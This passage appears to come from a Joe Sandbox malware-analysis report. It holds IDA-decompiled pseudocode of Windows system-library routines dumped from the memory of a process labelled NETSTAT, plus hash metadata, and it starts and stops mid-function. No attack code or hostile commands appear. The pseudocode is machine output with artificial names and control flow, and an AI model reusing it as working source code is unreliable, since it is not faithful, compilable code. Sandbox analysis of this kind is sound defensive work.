                                      				signed int _v20;
                                      				signed char _v24;
                                      				intOrPtr _v28;
                                      				signed int _v32;
                                      				void* _v36;
                                      				char _v48;
                                      				signed int _v52;
                                      				signed int _v56;
                                      				unsigned int _v60;
                                      				char _v64;
                                      				unsigned int _v68;
                                      				signed int _v72;
                                      				char _v73;
                                      				signed int _v74;
                                      				char _v75;
                                      				signed int _v76;
                                      				void* _v81;
                                      				void* _v82;
                                      				void* _v89;
                                      				void* _v92;
                                      				void* _v97;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* __ebp;
                                      				signed char _t128;
                                      				void* _t129;
                                      				signed int _t130;
                                      				void* _t132;
                                      				signed char _t133;
                                      				intOrPtr _t135;
                                      				signed int _t137;
                                      				signed int _t140;
                                      				signed int* _t144;
                                      				signed int* _t145;
                                      				intOrPtr _t146;
                                      				signed int _t147;
                                      				signed char* _t148;
                                      				signed int _t149;
                                      				signed int _t153;
                                      				signed int _t169;
                                      				signed int _t174;
                                      				signed int _t180;
                                      				void* _t197;
                                      				void* _t198;
                                      				signed int _t201;
                                      				intOrPtr* _t202;
                                      				intOrPtr* _t205;
                                      				signed int _t210;
                                      				signed int _t215;
                                      				signed int _t218;
                                      				signed char _t221;
                                      				signed int _t226;
                                      				char _t227;
                                      				signed int _t228;
                                      				void* _t229;
                                      				unsigned int _t231;
                                      				void* _t235;
                                      				signed int _t240;
                                      				signed int _t241;
                                      				void* _t242;
                                      				signed int _t246;
                                      				signed int _t248;
                                      				signed int _t252;
                                      				signed int _t253;
                                      				void* _t254;
                                      				intOrPtr* _t256;
                                      				intOrPtr _t257;
                                      				unsigned int _t262;
                                      				signed int _t265;
                                      				void* _t267;
                                      				signed int _t275;
                                      
                                      				_t198 = __ebx;
                                      				_t267 = (_t265 & 0xfffffff0) - 0x48;
                                      				_v68 = __ecx;
                                      				_v73 = 0;
                                      				_t201 = __edx & 0x00002000;
                                      				_t128 = __edx & 0xffffdfff;
                                      				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                                      				_v72 = _t128;
                                      				if((_t128 & 0x00000008) != 0) {
                                      					__eflags = _t128 - 8;
                                      					if(_t128 != 8) {
                                      						L69:
                                      						_t129 = 0xc000000d;
                                      						goto L23;
                                      					} else {
                                      						_t130 = 0;
                                      						_v72 = 0;
                                      						_v75 = 1;
                                      						L2:
                                      						_v74 = 1;
                                      						_t226 =  *0x2f58714; // 0x0
                                      						if(_t226 != 0) {
                                      							__eflags = _t201;
                                      							if(_t201 != 0) {
                                      								L62:
                                      								_v74 = 1;
                                      								L63:
                                      								_t130 = _t226 & 0xffffdfff;
                                      								_v72 = _t130;
                                      								goto L3;
                                      							}
                                      							_v74 = _t201;
                                      							__eflags = _t226 & 0x00002000;
                                      							if((_t226 & 0x00002000) == 0) {
                                      								goto L63;
                                      							}
                                      							goto L62;
                                      						}
                                      						L3:
                                      						_t227 = _v75;
                                      						L4:
                                      						_t240 = 0;
                                      						_v56 = 0;
                                      						_t252 = _t130 & 0x00000100;
                                      						if(_t252 != 0 || _t227 != 0) {
                                      							_t240 = _v68;
                                      							_t132 = E02E92EB0(_t240);
                                      							__eflags = _t132 - 2;
                                      							if(_t132 != 2) {
                                      								__eflags = _t132 - 1;
                                      								if(_t132 == 1) {
                                      									goto L25;
                                      								}
                                      								__eflags = _t132 - 6;
                                      								if(_t132 == 6) {
                                      									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                                      									if( *((short*)(_t240 + 4)) != 0x3f) {
                                      										goto L40;
                                      									}
                                      									_t197 = E02E92EB0(_t240 + 8);
                                      									__eflags = _t197 - 2;
                                      									if(_t197 == 2) {
                                      										goto L25;
                                      									}
                                      								}
                                      								L40:
                                      								_t133 = 1;
                                      								L26:
                                      								_t228 = _v75;
                                      								_v56 = _t240;
                                      								__eflags = _t133;
                                      								if(_t133 != 0) {
                                      									__eflags = _t228;
                                      									if(_t228 == 0) {
                                      										L43:
                                      										__eflags = _v72;
                                      										if(_v72 == 0) {
                                      											goto L8;
                                      										}
                                      										goto L69;
                                      									}
                                      									_t133 = E02E658EC(_t240);
                                      									_t221 =  *0x2f55cac; // 0x16
                                      									__eflags = _t221 & 0x00000040;
                                      									if((_t221 & 0x00000040) != 0) {
                                      										_t228 = 0;
                                      										__eflags = _t252;
                                      										if(_t252 != 0) {
                                      											goto L43;
                                      										}
                                      										_t133 = _v72;
                                      										goto L7;
                                      									}
                                      									goto L43;
                                      								} else {
                                      									_t133 = _v72;
                                      									goto L6;
                                      								}
                                      							}
                                      							L25:
                                      							_t133 = _v73;
                                      							goto L26;
                                      						} else {
                                      							L6:
                                      							_t221 =  *0x2f55cac; // 0x16
                                      							L7:
                                      							if(_t133 != 0) {
                                      								__eflags = _t133 & 0x00001000;
                                      								if((_t133 & 0x00001000) != 0) {
                                      									_t133 = _t133 | 0x00000a00;
                                      									__eflags = _t221 & 0x00000004;
                                      									if((_t221 & 0x00000004) != 0) {
                                      										_t133 = _t133 | 0x00000400;
                                      									}
                                      								}
                                      								__eflags = _t228;
                                      								if(_t228 != 0) {
                                      									_t133 = _t133 | 0x00000100;
                                      								}
                                      								_t229 = E02EA4A2C(0x2f56e40, 0x2ea4b30, _t133, _t240);
                                      								__eflags = _t229;
                                      								if(_t229 == 0) {
                                      									_t202 = _a20;
                                      									goto L100;
                                      								} else {
                                      									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                                      									L15:
                                      									_t202 = _a20;
                                      									 *_t202 = _t135;
                                      									if(_t229 == 0) {
                                      										L100:
                                      										 *_a4 = 0;
                                      										_t137 = _a8;
                                      										__eflags = _t137;
                                      										if(_t137 != 0) {
                                      											 *_t137 = 0;
                                      										}
                                      										 *_t202 = 0;
                                      										_t129 = 0xc0000017;
                                      										goto L23;
                                      									} else {
                                      										_t242 = _a16;
                                      										if(_t242 != 0) {
                                      											_t254 = _t229;
                                      											memcpy(_t242, _t254, 0xd << 2);
                                      											_t267 = _t267 + 0xc;
                                      											_t242 = _t254 + 0x1a;
                                      										}
                                      										_t205 = _a4;
                                      										_t25 = _t229 + 0x48; // 0x48
                                      										 *_t205 = _t25;
                                      										_t140 = _a8;
                                      										if(_t140 != 0) {
                                      											__eflags =  *((char*)(_t267 + 0xa));
                                      											if( *((char*)(_t267 + 0xa)) != 0) {
                                      												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                                      											} else {
                                      												 *_t140 = 0;
                                      											}
                                      										}
                                      										_t256 = _a12;
                                      										if(_t256 != 0) {
                                      											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                                      										}
                                      										_t257 =  *_t205;
                                      										_v48 = 0;
                                      										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                                      										_v56 = 0;
                                      										_v52 = 0;
                                      										_t144 =  *( *[fs:0x30] + 0x50);
                                      										if(_t144 != 0) {
                                      											__eflags =  *_t144;
                                      											if( *_t144 == 0) {
                                      												goto L20;
                                      											}
                                      											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                      											goto L21;
                                      										} else {
                                      											L20:
                                      											_t145 = 0x7ffe0384;
                                      											L21:
                                      											if( *_t145 != 0) {
                                      												_t146 =  *[fs:0x30];
                                      												__eflags =  *(_t146 + 0x240) & 0x00000004;
                                      												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                                      													_t147 = E02E87D50();
                                      													__eflags = _t147;
                                      													if(_t147 == 0) {
                                      														_t148 = 0x7ffe0385;
                                      													} else {
                                      														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                      													}
                                      													__eflags =  *_t148 & 0x00000020;
                                      													if(( *_t148 & 0x00000020) != 0) {
                                      														_t149 = _v72;
                                      														__eflags = _t149;
                                      														if(__eflags == 0) {
                                      															_t149 = 0x2e45c80;
                                      														}
                                      														_push(_t149);
                                      														_push( &_v48);
                                      														 *((char*)(_t267 + 0xb)) = E02E9F6E0(_t198, _t242, _t257, __eflags);
                                      														_push(_t257);
                                      														_push( &_v64);
                                      														_t153 = E02E9F6E0(_t198, _t242, _t257, __eflags);
                                      														__eflags =  *((char*)(_t267 + 0xb));
                                      														if( *((char*)(_t267 + 0xb)) != 0) {
                                      															__eflags = _t153;
                                      															if(_t153 != 0) {
                                      																__eflags = 0;
                                      																E02EE7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                                      																L02E82400(_t267 + 0x20);
                                      															}
                                      															L02E82400( &_v64);
                                      														}
                                      													}
                                      												}
                                      											}
                                      											_t129 = 0;
                                      											L23:
                                      											return _t129;
                                      										}
                                      									}
                                      								}
                                      							}
                                      							L8:
                                      							_t275 = _t240;
                                      							if(_t275 != 0) {
                                      								_v73 = 0;
                                      								_t253 = 0;
                                      								__eflags = 0;
                                      								L29:
                                      								_push(0);
                                      								_t241 = E02E92397(_t240);
                                      								__eflags = _t241;
                                      								if(_t241 == 0) {
                                      									_t229 = 0;
                                      									L14:
                                      									_t135 = 0;
                                      									goto L15;
                                      								}
                                      								__eflags =  *((char*)(_t267 + 0xb));
                                      								 *(_t241 + 0x34) = 1;
                                      								if( *((char*)(_t267 + 0xb)) != 0) {
                                      									E02E82280(_t134, 0x2f58608);
                                      									__eflags =  *0x2f56e48 - _t253; // 0x3f8820
                                      									if(__eflags != 0) {
                                      										L48:
                                      										_t253 = 0;
                                      										__eflags = 0;
                                      										L49:
                                      										E02E7FFB0(_t198, _t241, 0x2f58608);
                                      										__eflags = _t253;
                                      										if(_t253 != 0) {
                                      											L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                                      										}
                                      										goto L31;
                                      									}
                                      									 *0x2f56e48 = _t241;
                                      									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                                      									__eflags = _t253;
                                      									if(_t253 != 0) {
                                      										_t57 = _t253 + 0x34;
                                      										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                                      										__eflags =  *_t57;
                                      										if( *_t57 == 0) {
                                      											goto L49;
                                      										}
                                      									}
                                      									goto L48;
                                      								}
                                      								L31:
                                      								_t229 = _t241;
                                      								goto L14;
                                      							}
                                      							_v73 = 1;
                                      							_v64 = _t240;
                                      							asm("lock bts dword [esi], 0x0");
                                      							if(_t275 < 0) {
                                      								_t231 =  *0x2f58608; // 0x0
                                      								while(1) {
                                      									_v60 = _t231;
                                      									__eflags = _t231 & 0x00000001;
                                      									if((_t231 & 0x00000001) != 0) {
                                      										goto L76;
                                      									}
                                      									_t73 = _t231 + 1; // 0x1
                                      									_t210 = _t73;
                                      									asm("lock cmpxchg [edi], ecx");
                                      									__eflags = _t231 - _t231;
                                      									if(_t231 != _t231) {
                                      										L92:
                                      										_t133 = E02E96B90(_t210,  &_v64);
                                      										_t262 =  *0x2f58608; // 0x0
                                      										L93:
                                      										_t231 = _t262;
                                      										continue;
                                      									}
                                      									_t240 = _v56;
                                      									goto L10;
                                      									L76:
                                      									_t169 = E02E9E180(_t133);
                                      									__eflags = _t169;
                                      									if(_t169 != 0) {
                                      										_push(0xc000004b);
                                      										_push(0xffffffff);
                                      										E02EA97C0();
                                      										_t231 = _v68;
                                      									}
                                      									_v72 = 0;
                                      									_v24 =  *( *[fs:0x18] + 0x24);
                                      									_v16 = 3;
                                      									_v28 = 0;
                                      									__eflags = _t231 & 0x00000002;
                                      									if((_t231 & 0x00000002) == 0) {
                                      										_v32 =  &_v36;
                                      										_t174 = _t231 >> 4;
                                      										__eflags = 1 - _t174;
                                      										_v20 = _t174;
                                      										asm("sbb ecx, ecx");
                                      										_t210 = 3 |  &_v36;
                                      										__eflags = _t174;
                                      										if(_t174 == 0) {
                                      											_v20 = 0xfffffffe;
                                      										}
                                      									} else {
                                      										_v32 = 0;
                                      										_v20 = 0xffffffff;
                                      										_v36 = _t231 & 0xfffffff0;
                                      										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                                      										_v72 =  !(_t231 >> 2) & 0xffffff01;
                                      									}
                                      									asm("lock cmpxchg [edi], esi");
                                      									_t262 = _t231;
                                      									__eflags = _t262 - _t231;
                                      									if(_t262 != _t231) {
                                      										goto L92;
                                      									} else {
                                      										__eflags = _v72;
                                      										if(_v72 != 0) {
                                      											E02EA006A(0x2f58608, _t210);
                                      										}
                                      										__eflags =  *0x7ffe036a - 1;
                                      										if(__eflags <= 0) {
                                      											L89:
                                      											_t133 =  &_v16;
                                      											asm("lock btr dword [eax], 0x1");
                                      											if(__eflags >= 0) {
                                      												goto L93;
                                      											} else {
                                      												goto L90;
                                      											}
                                      											do {
                                      												L90:
                                      												_push(0);
                                      												_push(0x2f58608);
                                      												E02EAB180();
                                      												_t133 = _v24;
                                      												__eflags = _t133 & 0x00000004;
                                      											} while ((_t133 & 0x00000004) == 0);
                                      											goto L93;
                                      										} else {
                                      											_t218 =  *0x2f56904; // 0x400
                                      											__eflags = _t218;
                                      											if(__eflags == 0) {
                                      												goto L89;
                                      											} else {
                                      												goto L87;
                                      											}
                                      											while(1) {
                                      												L87:
                                      												__eflags = _v16 & 0x00000002;
                                      												if(__eflags == 0) {
                                      													goto L89;
                                      												}
                                      												asm("pause");
                                      												_t218 = _t218 - 1;
                                      												__eflags = _t218;
                                      												if(__eflags != 0) {
                                      													continue;
                                      												}
                                      												goto L89;
                                      											}
                                      											goto L89;
                                      										}
                                      									}
                                      								}
                                      							}
                                      							L10:
                                      							_t229 =  *0x2f56e48; // 0x3f8820
                                      							_v72 = _t229;
                                      							if(_t229 == 0) {
                                      								L45:
                                      								E02E7FFB0(_t198, _t240, 0x2f58608);
                                      								_t253 = _v76;
                                      								goto L29;
                                      							}
                                      							if( *((char*)(_t229 + 0x40)) != 0) {
                                      								L13:
                                      								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                                      								asm("lock cmpxchg [esi], ecx");
                                      								_t215 = 1;
                                      								if(1 != 1) {
                                      									while(1) {
                                      										_t246 = _t215 & 0x00000006;
                                      										_t180 = _t215;
                                      										__eflags = _t246 - 2;
                                      										_v56 = _t246;
                                      										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                                      										asm("lock cmpxchg [edi], esi");
                                      										_t248 = _v56;
                                      										__eflags = _t180 - _t215;
                                      										if(_t180 == _t215) {
                                      											break;
                                      										}
                                      										_t215 = _t180;
                                      									}
                                      									__eflags = _t248 - 2;
                                      									if(_t248 == 2) {
                                      										__eflags = 0;
                                      										E02EA00C2(0x2f58608, 0, _t235);
                                      									}
                                      									_t229 = _v72;
                                      								}
                                      								goto L14;
                                      							}
                                      							_t18 = _t229 + 0x38; // 0x8
                                      							if( *_t18 !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                      								goto L45;
                                      							}
                                      							goto L13;
                                      						}
                                      					}
                                      				}
                                      				_t227 = 0;
                                      				_v75 = 0;
                                      				if(_t128 != 0) {
                                      					goto L4;
                                      				}
                                      				goto L2;
                                      			}


                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fea1dc1f80335fc86964056d045067344f932addbf67568126797c41ec11830c
                                      • Instruction ID: dbef991f5af90c0ae2675bf6a1691f4bec16f974dbe2e2fdeafde63b0e908f0d
                                      • Opcode Fuzzy Hash: fea1dc1f80335fc86964056d045067344f932addbf67568126797c41ec11830c
                                      • Instruction Fuzzy Hash: 34F1D531A88341AFDF25CB29C4407AA7BE5AF85358F04E51EFE999B280D735D841CF92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 92%
                                      			E02E7849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                                      				void* _t136;
                                      				signed int _t139;
                                      				signed int _t141;
                                      				signed int _t145;
                                      				intOrPtr _t146;
                                      				signed int _t149;
                                      				signed int _t150;
                                      				signed int _t161;
                                      				signed int _t163;
                                      				signed int _t165;
                                      				signed int _t169;
                                      				signed int _t171;
                                      				signed int _t194;
                                      				signed int _t200;
                                      				void* _t201;
                                      				signed int _t204;
                                      				signed int _t206;
                                      				signed int _t210;
                                      				signed int _t214;
                                      				signed int _t215;
                                      				signed int _t218;
                                      				void* _t221;
                                      				signed int _t224;
                                      				signed int _t226;
                                      				intOrPtr _t228;
                                      				signed int _t232;
                                      				signed int _t233;
                                      				signed int _t234;
                                      				void* _t237;
                                      				void* _t238;
                                      
                                      				_t236 = __esi;
                                      				_t235 = __edi;
                                      				_t193 = __ebx;
                                      				_push(0x70);
                                      				_push(0x2f3f9c0);
                                      				E02EBD0E8(__ebx, __edi, __esi);
                                      				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                                      				if( *0x2f57b04 == 0) {
                                      					L4:
                                      					goto L5;
                                      				} else {
                                      					_t136 = E02E7CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                                      					_t236 = 0;
                                      					if(_t136 < 0) {
                                      						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                                      					}
                                      					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                                      						_t193 =  *( *[fs:0x30] + 0x18);
                                      						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                                      						 *(_t237 - 0x68) = _t236;
                                      						 *(_t237 - 0x6c) = _t236;
                                      						_t235 = _t236;
                                      						 *(_t237 - 0x60) = _t236;
                                      						E02E82280( *[fs:0x30], 0x2f58550);
                                      						_t139 =  *0x2f57b04; // 0x1
                                      						__eflags = _t139 - 1;
                                      						if(__eflags != 0) {
                                      							_t200 = 0xc;
                                      							_t201 = _t237 - 0x40;
                                      							_t141 = E02E9F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                                      							 *(_t237 - 0x44) = _t141;
                                      							__eflags = _t141;
                                      							if(_t141 < 0) {
                                      								L50:
                                      								E02E7FFB0(_t193, _t235, 0x2f58550);
                                      								L5:
                                      								return E02EBD130(_t193, _t235, _t236);
                                      							}
                                      							_push(_t201);
                                      							_t221 = 0x10;
                                      							_t202 =  *(_t237 - 0x40);
                                      							_t145 = E02E61C45( *(_t237 - 0x40), _t221);
                                      							 *(_t237 - 0x44) = _t145;
                                      							__eflags = _t145;
                                      							if(_t145 < 0) {
                                      								goto L50;
                                      							}
                                      							_t146 =  *0x2f57b9c; // 0x0
                                      							_t235 = L02E84620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                                      							 *(_t237 - 0x60) = _t235;
                                      							__eflags = _t235;
                                      							if(_t235 == 0) {
                                      								_t149 = 0xc0000017;
                                      								 *(_t237 - 0x44) = 0xc0000017;
                                      							} else {
                                      								_t149 =  *(_t237 - 0x44);
                                      							}
                                      							__eflags = _t149;
                                      							if(__eflags >= 0) {
                                      								L8:
                                      								 *(_t237 - 0x64) = _t235;
                                      								_t150 =  *0x2f57b10; // 0x8
                                      								 *(_t237 - 0x4c) = _t150;
                                      								_push(_t237 - 0x74);
                                      								_push(_t237 - 0x39);
                                      								_push(_t237 - 0x58);
                                      								_t193 = E02E9A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                                      								 *(_t237 - 0x44) = _t193;
                                      								__eflags = _t193;
                                      								if(_t193 < 0) {
                                      									L30:
                                      									E02E7FFB0(_t193, _t235, 0x2f58550);
                                      									__eflags = _t235 - _t237 - 0x38;
                                      									if(_t235 != _t237 - 0x38) {
                                      										_t235 =  *(_t237 - 0x48);
                                      										L02E877F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                                      									} else {
                                      										_t235 =  *(_t237 - 0x48);
                                      									}
                                      									__eflags =  *(_t237 - 0x6c);
                                      									if( *(_t237 - 0x6c) != 0) {
                                      										L02E877F0(_t235, _t236,  *(_t237 - 0x6c));
                                      									}
                                      									__eflags = _t193;
                                      									if(_t193 >= 0) {
                                      										goto L4;
                                      									} else {
                                      										goto L5;
                                      									}
                                      								}
                                      								_t204 =  *0x2f57b04; // 0x1
                                      								 *(_t235 + 8) = _t204;
                                      								__eflags =  *((char*)(_t237 - 0x39));
                                      								if( *((char*)(_t237 - 0x39)) != 0) {
                                      									 *(_t235 + 4) = 1;
                                      									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                                      									_t161 =  *0x2f57b10; // 0x8
                                      									 *(_t237 - 0x4c) = _t161;
                                      								} else {
                                      									 *(_t235 + 4) = _t236;
                                      									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                                      								}
                                      								 *((intOrPtr*)(_t237 - 0x54)) = E02EA37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                                      								_t224 = _t236;
                                      								 *(_t237 - 0x40) = _t236;
                                      								 *(_t237 - 0x50) = _t236;
                                      								while(1) {
                                      									_t163 =  *(_t235 + 8);
                                      									__eflags = _t224 - _t163;
                                      									if(_t224 >= _t163) {
                                      										break;
                                      									}
                                      									_t228 =  *0x2f57b9c; // 0x0
                                      									_t214 = L02E84620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                                      									 *(_t237 - 0x78) = _t214;
                                      									__eflags = _t214;
                                      									if(_t214 == 0) {
                                      										L52:
                                      										_t193 = 0xc0000017;
                                      										L19:
                                      										 *(_t237 - 0x44) = _t193;
                                      										L20:
                                      										_t206 =  *(_t237 - 0x40);
                                      										__eflags = _t206;
                                      										if(_t206 == 0) {
                                      											L26:
                                      											__eflags = _t193;
                                      											if(_t193 < 0) {
                                      												E02EA37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                                      												__eflags =  *((char*)(_t237 - 0x39));
                                      												if( *((char*)(_t237 - 0x39)) != 0) {
                                      													 *0x2f57b10 =  *0x2f57b10 - 8;
                                      												}
                                      											} else {
                                      												_t169 =  *(_t237 - 0x68);
                                      												__eflags = _t169;
                                      												if(_t169 != 0) {
                                      													 *0x2f57b04 =  *0x2f57b04 - _t169;
                                      												}
                                      											}
                                      											__eflags = _t193;
                                      											if(_t193 >= 0) {
                                      												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                                      											}
                                      											goto L30;
                                      										}
                                      										_t226 = _t206 * 0xc;
                                      										__eflags = _t226;
                                      										_t194 =  *(_t237 - 0x48);
                                      										do {
                                      											 *(_t237 - 0x40) = _t206 - 1;
                                      											_t226 = _t226 - 0xc;
                                      											 *(_t237 - 0x4c) = _t226;
                                      											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                                      											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                                      												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                                      												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                                      													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                                      													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                      													__eflags =  *((char*)(_t237 - 0x39));
                                      													if( *((char*)(_t237 - 0x39)) == 0) {
                                      														_t171 = _t210;
                                      													} else {
                                      														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                                      														L02E877F0(_t194, _t236, _t210 - 8);
                                      														_t171 =  *(_t237 - 0x50);
                                      													}
                                      													L48:
                                      													L02E877F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                                      													L46:
                                      													_t206 =  *(_t237 - 0x40);
                                      													_t226 =  *(_t237 - 0x4c);
                                      													goto L24;
                                      												}
                                      												 *0x2f57b08 =  *0x2f57b08 + 1;
                                      												goto L24;
                                      											}
                                      											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                      											__eflags = _t171;
                                      											if(_t171 != 0) {
                                      												__eflags =  *((char*)(_t237 - 0x39));
                                      												if( *((char*)(_t237 - 0x39)) == 0) {
                                      													goto L48;
                                      												}
                                      												E02EA57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                                      												goto L46;
                                      											}
                                      											L24:
                                      											__eflags = _t206;
                                      										} while (_t206 != 0);
                                      										_t193 =  *(_t237 - 0x44);
                                      										goto L26;
                                      									}
                                      									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                                      									 *(_t237 - 0x7c) = _t232;
                                      									 *(_t232 - 4) = _t214;
                                      									 *(_t237 - 4) = _t236;
                                      									E02EAF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                                      									_t238 = _t238 + 0xc;
                                      									 *(_t237 - 4) = 0xfffffffe;
                                      									_t215 =  *(_t237 - 0x48);
                                      									__eflags = _t193;
                                      									if(_t193 < 0) {
                                      										L02E877F0(_t215, _t236,  *(_t237 - 0x78));
                                      										goto L20;
                                      									}
                                      									__eflags =  *((char*)(_t237 - 0x39));
                                      									if( *((char*)(_t237 - 0x39)) != 0) {
                                      										_t233 = E02E9A44B( *(_t237 - 0x4c));
                                      										 *(_t237 - 0x50) = _t233;
                                      										__eflags = _t233;
                                      										if(_t233 == 0) {
                                      											L02E877F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                                      											goto L52;
                                      										}
                                      										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                                      										L17:
                                      										_t234 =  *(_t237 - 0x40);
                                      										_t218 = _t234 * 0xc;
                                      										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                                      										 *(_t218 + _t235 + 0x10) = _t236;
                                      										_t224 = _t234 + 1;
                                      										 *(_t237 - 0x40) = _t224;
                                      										 *(_t237 - 0x50) = _t224;
                                      										_t193 =  *(_t237 - 0x44);
                                      										continue;
                                      									}
                                      									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                                      									goto L17;
                                      								}
                                      								 *_t235 = _t236;
                                      								_t165 = 0x10 + _t163 * 0xc;
                                      								__eflags = _t165;
                                      								_push(_t165);
                                      								_push(_t235);
                                      								_push(0x23);
                                      								_push(0xffffffff);
                                      								_t193 = E02EA96C0();
                                      								goto L19;
                                      							} else {
                                      								goto L50;
                                      							}
                                      						}
                                      						_t235 = _t237 - 0x38;
                                      						 *(_t237 - 0x60) = _t235;
                                      						goto L8;
                                      					}
                                      					goto L4;
                                      				}
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c7e8f693548f223d14c8aa5d4b77d132ac1c926e6b8be3f0ad5b4b62aea5a659
                                      • Instruction ID: 0ff7e5660115cf1907cae905740e3e6ee944c6bc54b3dbfe824a6e8ec06c0f11
                                      • Opcode Fuzzy Hash: c7e8f693548f223d14c8aa5d4b77d132ac1c926e6b8be3f0ad5b4b62aea5a659
                                      • Instruction Fuzzy Hash: EDB16C74E40249EFDB18DFE8C994AADFBB6BF54308F109129E505AB345D770A841CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 67%
                                      			E02E9513A(intOrPtr __ecx, void* __edx) {
                                      				signed int _v8;
                                      				signed char _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				char _v28;
                                      				signed int _v32;
                                      				signed int _v36;
                                      				signed int _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				char _v63;
                                      				char _v64;
                                      				signed int _v72;
                                      				signed int _v76;
                                      				signed int _v80;
                                      				signed int _v84;
                                      				signed int _v88;
                                      				signed char* _v92;
                                      				signed int _v100;
                                      				signed int _v104;
                                      				char _v105;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* _t157;
                                      				signed int _t159;
                                      				signed int _t160;
                                      				unsigned int* _t161;
                                      				intOrPtr _t165;
                                      				signed int _t172;
                                      				signed char* _t181;
                                      				intOrPtr _t189;
                                      				intOrPtr* _t200;
                                      				signed int _t202;
                                      				signed int _t203;
                                      				char _t204;
                                      				signed int _t207;
                                      				signed int _t208;
                                      				void* _t209;
                                      				intOrPtr _t210;
                                      				signed int _t212;
                                      				signed int _t214;
                                      				signed int _t221;
                                      				signed int _t222;
                                      				signed int _t226;
                                      				intOrPtr* _t232;
                                      				signed int _t233;
                                      				signed int _t234;
                                      				intOrPtr _t237;
                                      				intOrPtr _t238;
                                      				intOrPtr _t240;
                                      				void* _t245;
                                      				signed int _t246;
                                      				signed int _t247;
                                      				void* _t248;
                                      				void* _t251;
                                      				void* _t252;
                                      				signed int _t253;
                                      				signed int _t255;
                                      				signed int _t256;
                                      
                                      				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                                      				_v8 =  *0x2f5d360 ^ _t255;
                                      				_v32 = _v32 & 0x00000000;
                                      				_t251 = __edx;
                                      				_t237 = __ecx;
                                      				_t212 = 6;
                                      				_t245 =  &_v84;
